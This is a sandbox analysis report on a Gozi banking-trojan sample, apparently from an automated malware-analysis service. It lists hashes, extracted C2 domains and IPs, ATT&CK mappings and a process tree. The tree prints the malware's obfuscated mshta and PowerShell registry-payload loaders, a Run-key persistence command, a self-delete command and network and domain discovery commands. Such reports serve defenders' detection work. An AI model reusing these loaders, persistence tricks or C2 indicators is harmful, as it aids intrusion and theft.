gozi | 0ab7b970fa1728713371d1f9186c1910a490964c8c4afb54ebe158ba6fe8030b

Analysis

max time kernel
600s
max time network
565s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
14-12-2022 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ZipCosdaz1_detrunked.exe
Size

238KB
MD5

630bbad3b703e4726558584b4eb0d6a5
SHA1

d88ca9a9bfdcce2b453d56b09ae134b0d861f27c
SHA256

0ab7b970fa1728713371d1f9186c1910a490964c8c4afb54ebe158ba6fe8030b
SHA512

5df5acd85194b6a346955cf3f32111e12825f08bfca69fe13e6eaeed904d7a4158a744242d8db8bec621c9b823ccfefefdb602531d51b605bea823e9217410b0
SSDEEP

6144:v5RXU9L/3zwa5YRIWTNPU9dV7n/7CWKADsd:hRXSD3UuYK2PUHVz/eiDsd

Score

10^/10

gozi 2002 banker isfb persistence trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

2002

trackingg-protectioon.cdn4.mozilla.net

45.11.182.97

79.132.128.108

protectioon.cdn4.mozilla.net

91.241.93.98

79.132.128.109

91.242.217.28

91.241.93.111

Attributes

base_path
/fonts/
build
250249
exe_type
loader
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

2002

trackingg-protectioon.cdn4.mozilla.net

45.11.182.97

79.132.128.108

protectioon.cdn4.mozilla.net

91.241.93.98

79.132.128.109

91.242.217.28

91.241.93.111

Attributes

base_path
/fonts/
exe_type
worker
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\DeviceProcess = "cmd /c start C:\\Users\\Admin\\DeviceProcess.lnk -ep unrestricted -file C:\\Users\\Admin\\CoreMark.ps1"	Explorer.EXE

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4644 set thread context of 2604	4644	powershell.exe	Explorer.EXE
PID 2604 set thread context of 3540	2604	Explorer.EXE	RuntimeBroker.exe
PID 2604 set thread context of 4892	2604	Explorer.EXE	cmd.exe
PID 4892 set thread context of 2924	4892	cmd.exe	PING.EXE
PID 2604 set thread context of 3208	2604	Explorer.EXE	WinMail.exe
PID 2604 set thread context of 4800	2604	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

2092 net.exe
4272 net.exe
4676 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3564 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1036 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2924 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2924 PING.EXE

pid	process
2092	net.exe
4272	net.exe
4676	net.exe

pid	process
3564	tasklist.exe

pid	process
1036	systeminfo.exe

pid	process
2924	PING.EXE

pid	process
2924	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ZipCosdaz1_detrunked.exepowershell.exeExplorer.EXE

pid	process
2968	ZipCosdaz1_detrunked.exe
2968	ZipCosdaz1_detrunked.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE
2604	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2604 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4644 powershell.exe
2604 Explorer.EXE
2604 Explorer.EXE
4892 cmd.exe
2604 Explorer.EXE
2604 Explorer.EXE

pid	process
2604	Explorer.EXE

pid	process
4644	powershell.exe
2604	Explorer.EXE
2604	Explorer.EXE
4892	cmd.exe
2604	Explorer.EXE
2604	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeExplorer.EXEWMIC.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3768	WMIC.exe
Token: SeSecurityPrivilege	3768	WMIC.exe
Token: SeTakeOwnershipPrivilege	3768	WMIC.exe
Token: SeLoadDriverPrivilege	3768	WMIC.exe
Token: SeSystemProfilePrivilege	3768	WMIC.exe
Token: SeSystemtimePrivilege	3768	WMIC.exe
Token: SeProfSingleProcessPrivilege	3768	WMIC.exe
Token: SeIncBasePriorityPrivilege	3768	WMIC.exe
Token: SeCreatePagefilePrivilege	3768	WMIC.exe
Token: SeBackupPrivilege	3768	WMIC.exe
Token: SeRestorePrivilege	3768	WMIC.exe
Token: SeShutdownPrivilege	3768	WMIC.exe
Token: SeDebugPrivilege	3768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3768	WMIC.exe
Token: SeRemoteShutdownPrivilege	3768	WMIC.exe
Token: SeUndockPrivilege	3768	WMIC.exe
Token: SeManageVolumePrivilege	3768	WMIC.exe
Token: 33	3768	WMIC.exe
Token: 34	3768	WMIC.exe
Token: 35	3768	WMIC.exe
Token: 36	3768	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3768	WMIC.exe
Token: SeSecurityPrivilege	3768	WMIC.exe
Token: SeTakeOwnershipPrivilege	3768	WMIC.exe
Token: SeLoadDriverPrivilege	3768	WMIC.exe
Token: SeSystemProfilePrivilege	3768	WMIC.exe
Token: SeSystemtimePrivilege	3768	WMIC.exe
Token: SeProfSingleProcessPrivilege	3768	WMIC.exe
Token: SeIncBasePriorityPrivilege	3768	WMIC.exe
Token: SeCreatePagefilePrivilege	3768	WMIC.exe
Token: SeBackupPrivilege	3768	WMIC.exe
Token: SeRestorePrivilege	3768	WMIC.exe
Token: SeShutdownPrivilege	3768	WMIC.exe
Token: SeDebugPrivilege	3768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3768	WMIC.exe
Token: SeRemoteShutdownPrivilege	3768	WMIC.exe
Token: SeUndockPrivilege	3768	WMIC.exe
Token: SeManageVolumePrivilege	3768	WMIC.exe
Token: 33	3768	WMIC.exe
Token: 34	3768	WMIC.exe
Token: 35	3768	WMIC.exe
Token: 36	3768	WMIC.exe
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeDebugPrivilege	3564	tasklist.exe
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE
Token: SeShutdownPrivilege	2604	Explorer.EXE
Token: SeCreatePagefilePrivilege	2604	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2604 Explorer.EXE

pid	process
2604	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1208 wrote to memory of 4644	1208	mshta.exe	powershell.exe
PID 1208 wrote to memory of 4644	1208	mshta.exe	powershell.exe
PID 4644 wrote to memory of 4260	4644	powershell.exe	csc.exe
PID 4644 wrote to memory of 4260	4644	powershell.exe	csc.exe
PID 4260 wrote to memory of 4248	4260	csc.exe	cvtres.exe
PID 4260 wrote to memory of 4248	4260	csc.exe	cvtres.exe
PID 4644 wrote to memory of 4476	4644	powershell.exe	csc.exe
PID 4644 wrote to memory of 4476	4644	powershell.exe	csc.exe
PID 4476 wrote to memory of 3620	4476	csc.exe	cvtres.exe
PID 4476 wrote to memory of 3620	4476	csc.exe	cvtres.exe
PID 4644 wrote to memory of 2604	4644	powershell.exe	Explorer.EXE
PID 4644 wrote to memory of 2604	4644	powershell.exe	Explorer.EXE
PID 4644 wrote to memory of 2604	4644	powershell.exe	Explorer.EXE
PID 4644 wrote to memory of 2604	4644	powershell.exe	Explorer.EXE
PID 2604 wrote to memory of 3540	2604	Explorer.EXE	RuntimeBroker.exe
PID 2604 wrote to memory of 3540	2604	Explorer.EXE	RuntimeBroker.exe
PID 2604 wrote to memory of 3540	2604	Explorer.EXE	RuntimeBroker.exe
PID 2604 wrote to memory of 3540	2604	Explorer.EXE	RuntimeBroker.exe
PID 2604 wrote to memory of 4892	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4892	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4892	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4892	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4892	2604	Explorer.EXE	cmd.exe
PID 4892 wrote to memory of 2924	4892	cmd.exe	PING.EXE
PID 4892 wrote to memory of 2924	4892	cmd.exe	PING.EXE
PID 4892 wrote to memory of 2924	4892	cmd.exe	PING.EXE
PID 4892 wrote to memory of 2924	4892	cmd.exe	PING.EXE
PID 4892 wrote to memory of 2924	4892	cmd.exe	PING.EXE
PID 2604 wrote to memory of 4028	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4028	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 3208	2604	Explorer.EXE	WinMail.exe
PID 2604 wrote to memory of 3208	2604	Explorer.EXE	WinMail.exe
PID 2604 wrote to memory of 3208	2604	Explorer.EXE	WinMail.exe
PID 4028 wrote to memory of 3768	4028	cmd.exe	WMIC.exe
PID 4028 wrote to memory of 3768	4028	cmd.exe	WMIC.exe
PID 4028 wrote to memory of 1848	4028	cmd.exe	more.com
PID 4028 wrote to memory of 1848	4028	cmd.exe	more.com
PID 2604 wrote to memory of 3208	2604	Explorer.EXE	WinMail.exe
PID 2604 wrote to memory of 3208	2604	Explorer.EXE	WinMail.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 512	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 512	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 1292	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 1292	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 4800	2604	Explorer.EXE	cmd.exe
PID 1292 wrote to memory of 1036	1292	cmd.exe	systeminfo.exe
PID 1292 wrote to memory of 1036	1292	cmd.exe	systeminfo.exe
PID 2604 wrote to memory of 216	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 216	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 2220	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 2220	2604	Explorer.EXE	cmd.exe
PID 2220 wrote to memory of 2092	2220	cmd.exe	net.exe
PID 2220 wrote to memory of 2092	2220	cmd.exe	net.exe
PID 2604 wrote to memory of 2200	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 2200	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 2228	2604	Explorer.EXE	cmd.exe
PID 2604 wrote to memory of 2228	2604	Explorer.EXE	cmd.exe
PID 2228 wrote to memory of 2440	2228	cmd.exe	nslookup.exe
PID 2228 wrote to memory of 2440	2228	cmd.exe	nslookup.exe
PID 2604 wrote to memory of 1460	2604	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3540

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2604

C:\Users\Admin\AppData\Local\Temp\ZipCosdaz1_detrunked.exe
"C:\Users\Admin\AppData\Local\Temp\ZipCosdaz1_detrunked.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gnnm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gnnm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\B028EC19-4F24-6245-59E4-F3B69D58D74A\\\CoreMark'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqfqtxt -value gp; new-alias -name immrlikft -value iex; immrlikft ([System.Text.Encoding]::ASCII.GetString((iqfqtxt "HKCU:Software\AppDataLow\Software\Microsoft\B028EC19-4F24-6245-59E4-F3B69D58D74A").JunkSheet))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luyisz1v\luyisz1v.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FA8.tmp" "c:\Users\Admin\AppData\Local\Temp\luyisz1v\CSC2BA5189B2BCF443E852A22D539492FD7.TMP"
5⤵
PID:4248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\if3v1ntq\if3v1ntq.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20B2.tmp" "c:\Users\Admin\AppData\Local\Temp\if3v1ntq\CSC892ACB7EC004692BE44C6BF84238E76.TMP"
5⤵
PID:3620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ZipCosdaz1_detrunked.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2924

C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\system32\more.com
more
3⤵
PID:1848

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:3208

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4800

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:512

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:1036

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:216

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:2092

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2200

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:2440

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:1460

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2384

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:5028

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2148

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:5040

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:3872

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2020

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:4120

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:3764

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2860

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:4284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:4672

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:2700

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4040

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:3632

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4212

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4268

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:4264

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4296

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:3620

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:4272

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4204

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4468

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:4676

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:4736

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\D133.bin1 > C:\Users\Admin\AppData\Local\Temp\D133.bin & del C:\Users\Admin\AppData\Local\Temp\D133.bin1"
2⤵
PID:1644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D133.bin
Filesize
61KB

MD5
41bb38a73af51d8e60c2c54c1de4ae16

SHA1
6501fcad9a801c4640b2fa24d15599680a2d263c

SHA256
07601c6e5e6c96c9e4f513c5a2a78805a0a5128d5cd22e52dcb4500323f1bab0

SHA512
a394ea5c2362a6cec3d29e301ed41198c7798b7dbc3ed5c91cd49d6019719e099b95643e4e5170e645ada004d08c94dda9abf2642636ca0fc9839b27de35fff2

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
44B

MD5
f7aea2435aa888b709ca20f816c33bfd

SHA1
38717c9a73b5f8bd399839cbe0aa57518427e758

SHA256
f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

SHA512
1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
1abf2e5bca47df43952ddd7d6128e9f3

SHA1
b98e3f32f42b2c8b15716f8255097e96a5d3a469

SHA256
f96ab819887917898052ebb147f0bad3deb6bcae26426a3a0fa6802ceddb6917

SHA512
aacc8b5093a47a0810704c60de3f5a97fd8769294fbe31f0f48f4740825501b17d9f124865fd9bb66493e81fb5551972b259cf37acacac75e13fa04bceb94e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
1abf2e5bca47df43952ddd7d6128e9f3

SHA1
b98e3f32f42b2c8b15716f8255097e96a5d3a469

SHA256
f96ab819887917898052ebb147f0bad3deb6bcae26426a3a0fa6802ceddb6917

SHA512
aacc8b5093a47a0810704c60de3f5a97fd8769294fbe31f0f48f4740825501b17d9f124865fd9bb66493e81fb5551972b259cf37acacac75e13fa04bceb94e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
f6f629f39986f703d9ad7941582b250e

SHA1
fca77f8109f5d71a50fa60aed5e97a747f33c8f1

SHA256
11d680256a3eae08f2cf39e2b5848609d52a61f970a7c5112f4187faa2062b3a

SHA512
62d1960c92a7d09c2f6d77498536aecb8d8f76909cd99d042f6ff8dfe754106580c2ad5527bda8d7b352960f0af21eefa5869fce66fb9eebbde8d2220ba5292a

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
f6f629f39986f703d9ad7941582b250e

SHA1
fca77f8109f5d71a50fa60aed5e97a747f33c8f1

SHA256
11d680256a3eae08f2cf39e2b5848609d52a61f970a7c5112f4187faa2062b3a

SHA512
62d1960c92a7d09c2f6d77498536aecb8d8f76909cd99d042f6ff8dfe754106580c2ad5527bda8d7b352960f0af21eefa5869fce66fb9eebbde8d2220ba5292a

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
de8b3e6d96adf267d22a4b4f6e19f9bf

SHA1
88fb9773eee1470e5dcd2a839c96714145467232

SHA256
9504f4e22d8cc4ee0df4ed06264ec87e0728de6dc0de3a1ebb67ddbc464d4ab3

SHA512
9bf36f78bb9a326098d1d8717614724b779305b23e5cdf1bb6488c8dc9e4da5e088d16e195ca8f2305c5055c0e14f419f75472c49ee408e2ba475433d261bfe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
2KB

MD5
de8b3e6d96adf267d22a4b4f6e19f9bf

SHA1
88fb9773eee1470e5dcd2a839c96714145467232

SHA256
9504f4e22d8cc4ee0df4ed06264ec87e0728de6dc0de3a1ebb67ddbc464d4ab3

SHA512
9bf36f78bb9a326098d1d8717614724b779305b23e5cdf1bb6488c8dc9e4da5e088d16e195ca8f2305c5055c0e14f419f75472c49ee408e2ba475433d261bfe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
8KB

MD5
1f4547e07cea3dc4a16af4940d4d923b

SHA1
54b7cb17f7f41cba3f8ac099a83d33508752041e

SHA256
a84ca969c1ab4ec384125ac7d33e00fcaae7145e1583881d99541752c02f3c15

SHA512
7532495b19bb4701f0cf0f7fdc1dd0b96374f161bb01549809f8556b77f5f5428ab50d786393ac1bf6104eb939ce7c7c8dabbdc231e78ff4062a3fb77bd006f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
8KB

MD5
1f4547e07cea3dc4a16af4940d4d923b

SHA1
54b7cb17f7f41cba3f8ac099a83d33508752041e

SHA256
a84ca969c1ab4ec384125ac7d33e00fcaae7145e1583881d99541752c02f3c15

SHA512
7532495b19bb4701f0cf0f7fdc1dd0b96374f161bb01549809f8556b77f5f5428ab50d786393ac1bf6104eb939ce7c7c8dabbdc231e78ff4062a3fb77bd006f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
31KB

MD5
bbd0f64518a6035aa6da20417b8d23f0

SHA1
a4fc983622e8f557bef3d41cf67f49fed314a230

SHA256
a6bf279bcc55f01fbd3bbee1914405bbe4951d81beae60faae9f69949e11cd83

SHA512
587eab3284ba1f668493232785fd200d9f381c9c81a7cb631de81b419dcf8f5bb1b09ac9590230246f1f0cbb5ed74b2f56a1ceae3be533e417dd7ed817274831

Download Submit
C:\Users\Admin\AppData\Local\Temp\D133.bin1
Filesize
31KB

MD5
bbd0f64518a6035aa6da20417b8d23f0

SHA1
a4fc983622e8f557bef3d41cf67f49fed314a230

SHA256
a6bf279bcc55f01fbd3bbee1914405bbe4951d81beae60faae9f69949e11cd83

SHA512
